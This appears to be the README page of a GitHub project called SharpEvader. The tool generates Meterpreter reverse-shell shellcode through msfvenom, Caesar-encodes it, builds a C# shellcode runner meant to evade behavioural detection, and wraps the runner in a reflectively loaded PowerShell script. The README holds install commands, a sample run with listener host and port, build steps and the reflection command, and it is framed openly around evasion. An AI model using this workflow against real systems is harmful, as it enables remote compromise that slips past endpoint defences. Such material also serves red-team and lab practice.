Loading repository data…
Loading repository data…
Xyan1d3 / repository
This is a python script which automatically generates metepreter tcp or https shellcode encodes it and slaps some Behavioural detection in a c# Project for you to build and run
tcp/https shellcode and caeser encodes it and slaps some Behavioural detection in a c# Project for you to build and runwindows/x64/meterpreter/reverse_https or windows/x64/meterpreter/reverse_tcp shellcode by borrowing msfvenom(What more do you expect, Write an msfvenom clone from scratch ??) from your linux host.sudo apt update && sudo apt install python3 metasploit-framework mono-mcs powershell
# Metasploit-framework & Powershell are defaultly available on Kali & hopefully parrot(If your distro doesn't have it then its your headache)
~/SharpEvader > python3 sharpevader.py
____ _ _____ _
/ ___|| |__ __ _ _ __ _ __ | ____|_ ____ _ __| | ___ _ __
\___ \| '_ \ / _` | '__| '_ \| _| \ \ / / _` |/ _` |/ _ \ '__|
___) | | | | (_| | | | |_) | |___ \ V / (_| | (_| | __/ |
|____/|_| |_|\__,_|_| | .__/|_____| \_/ \__,_|\__,_|\___|_|
|_|
LHOST: 10.10.14.1
LPORT: 9001
PAYLOAD PROTO(tcp/https): tcp
PAYLOAD TYPE(exe[Default]/dll): exe
[*] Using LHOST as 10.10.14.1, LPORT as 9001 and PAYLOAD as windows/x64/meterpreter/reverse_tcp
[*] Generating msfvenom shellcode...
[+] MSFVenom Shellcode generation successful
[+] Encoded shellcode with caeser cipher with +7 as Key
[*] Deleting the msf_shellcode.hex file as no one wants it anymore
[*] Baking the fresh Shellcode into a C# project for compiling
[+] Your C# shellcode runner is baked successfully, and it smells nice !!!
[+] C# Compiler found, Time for some frosting on the cake ^_^
[+] Your cake has been frosted successfully and named output/10.10.14.1_9001_tcp_exe/rev.exe
[+] Powershell Found, Let\'s Box up your frosted cake...
[+] Boxed it up and named output/10.10.14.1_9001_tcp_exe/rev.ps1
[+] Happy Evasion using 10.10.14.1_9001_tcp_exe!!!
~/SharpEvader/output/10.10.14.1_9001_tcp_exe > ls -l
total 16
drwxr-xr-x 3 root root 4096 Aug 28 00:50 csharp
-rwxr-xr-x 1 root root 5120 Aug 28 00:50 rev.exe
-rw-r--r-- 1 root root 3275 Aug 28 00:50 rev.ps1
~/SharpEvader/output/10.10.14.1_9001_tcp/csharp > ls -l
total 24
-rwxr-xr-x 1 root root 189 Aug 9 17:26 App.config
-rwxr-xr-x 1 root root 4135 Aug 9 17:26 Program.cs
drwxr-xr-x 2 root root 4096 Aug 9 17:26 Properties
-rwxr-xr-x 1 root root 3189 Aug 9 17:26 rev.csproj
-rwxr-xr-x 1 root root 892 Aug 9 17:26 rev.sln
[[LHOST]_[LPORT]_[PAYLOADPROTO]_[PAYLOADTYPE]]/csharp/ from the output directory and launch rev.sln using Visual Studio.Release and x64 build configuration.[[LHOST]_[LPORT]_[PAYLOADPROTO]_[PAYLOADTYPE]]/csharp/bin/x64/Release/rev.exe or rev.dllreflection_pwsh_gen.ps1 supplying the -File argument as the absolute path to the rev.exe or rev.dllrev.ps1 which would be consist the C# exe or dll embedded into a ps1 script which would be reflectively loaded in the memory.~/SharpEvader > pwsh reflection_pwsh_gen.ps1 -File ~/SharpEvader/output/10.10.14.1_9001_tcp_exe/rev.exe
[+] Written the C# exe Embedded Reflection Reverse Shell into rev.ps1
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.